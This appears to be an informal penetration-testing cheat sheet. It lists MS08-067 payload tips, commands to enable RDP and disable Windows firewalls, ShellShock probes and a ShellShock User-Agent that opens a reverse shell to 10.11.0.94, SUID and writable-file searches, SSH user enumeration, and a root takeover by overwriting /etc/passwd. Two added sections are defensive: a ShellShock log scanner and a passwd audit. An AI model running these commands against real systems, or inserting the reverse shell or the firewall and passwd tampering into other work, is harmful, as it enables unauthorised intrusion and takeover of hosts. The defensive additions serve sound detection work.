messy security notes
Notes*

If an ms08-067 exploit exists but the host still cannot be exploited, or an encoding error occurs, change the payload. Use smaller payloads such as windows/shell_reverse_tcp; do not use meterpreter. If the payload is too large, metasploit reports "Exploit failed: No encoders encoded the buffer successfully."

If the administrator account is disabled, the error STATUS_USER_SESSION_DELETED is returned.

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

If the user does not exist:

ERROR: Failed to open connection - NT_STATUS_LOGON_FAILURE

If the user exists but has no privileges, ERROR:

Cannot connect to svcctl pipe. NT_STATUS_ACCESS_DENIED.

For the exploit to succeed it needs access to the IPC$ share.

"You just need access to the IPC$ share, not a named pipe."

Disable Firewall

XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off

Compile C code to exe in Linux

i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe

ShellShock

env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"

Find files writable by the current user:

find / -writable -type f 2>/dev/null | grep -v ^/proc

Find SUID files (-perm -4001 matches the setuid bit plus execute-for-others):

/bin/find / -perm -4001 -type f 2>/dev/null

shellshock

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1
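
Detection side of the two ShellShock sections above, as an added example that is not part of the original notes: scan a file of web-server access-log lines for the bash function-definition prefix "() {" that every ShellShock payload starts with (the same prefix used in the User-Agent line above) and print the source IP of each hit. The function names, the `SAMPLE_LOG` variable and the log lines are all constructed for the demo, not real traffic.

```shell
# Added example: ShellShock marker detection over access-log lines.
# Constructed sample (combined-log style, User-Agent is the last quoted field);
# none of these are real requests.
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2020:00:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2020:00:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c id"
10.0.0.7 - - [01/Jan/2020:00:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"'

# Print the first field (client IP) of each line carrying the "() {" marker.
# The regex tolerates variable whitespace between "()" and "{" so minor
# variants of the prefix are still caught. Argument: path to a log file.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*\{' "$1" | awk '{ print $1 }'
}

# Number of matching lines in the file, as a bare integer.
count_shellshock_hits() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Demo run on the constructed sample.
demo_log=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$demo_log"
echo "ShellShock attempts seen from: $(shellshock_hits "$demo_log")"
rm -f "$demo_log"
```

Run it against a real access log with `shellshock_hits /var/log/apache2/access.log` (path is an assumption about your layout); any hit is worth an incident ticket, since the prefix has no legitimate use in a User-Agent.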

Add directory to PATH

export PATH=$PATH:/usr/bin/

Samba version

msf > use auxiliary/scanner/smb/smb_version

64 Bit c and c++ compile in Linux

# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit

ssh user enumeration

for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done

udev 2.6

If /etc/passwd is writable;

$ echo root::0:0:root:/root:/bin/bash > /etc/passwd

then;

su

root is gained!

writable file and directory

find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
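
An audit for the weaknesses the "/etc/passwd is writable" section and the writable-file searches above rely on, as an added example that is not from the original notes: it checks a passwd-format file for an empty password field (the `root::0:0:...` shape shown above), for extra UID 0 accounts, and for whether the file is writable by the current user. The function names are hypothetical helpers and the sample file content is constructed for the demo.

```shell
# Added example: audit a passwd-format file for the misconfigurations used above.

# Names of accounts whose password field (2nd colon-separated field) is empty,
# which lets "su" to that account succeed without a password.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Names of accounts other than root that carry UID 0.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Audit one file (default /etc/passwd): prints a WARN line per finding and
# returns 1 if anything was found, 0 if the file looks clean.
audit_passwd() {
    file="${1:-/etc/passwd}"
    rc=0
    if [ -w "$file" ]; then
        echo "WARN: $file is writable by $(id -un)"
        rc=1
    fi
    for u in $(empty_password_accounts "$file"); do
        echo "WARN: empty password field for account '$u'"
        rc=1
    done
    for u in $(extra_uid0_accounts "$file"); do
        echo "WARN: extra UID 0 account '$u'"
        rc=1
    done
    return $rc
}

# Demo on constructed content (not a real system's passwd file): one empty
# password field and one non-root UID 0 account should be reported.
demo_file=$(mktemp)
printf 'root::0:0:root:/root:/bin/bash\nbob:x:1000:1000::/home/bob:/bin/sh\ntoor:x:0:0::/root:/bin/sh\n' > "$demo_file"
audit_passwd "$demo_file" || echo "sample file has findings (see WARN lines)"
rm -f "$demo_file"
```

On a real host run `audit_passwd` with no argument; a non-zero return from a non-root shell means exactly the condition the notes above exploit.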

Last updated 5 years ago


udev exploit tutorial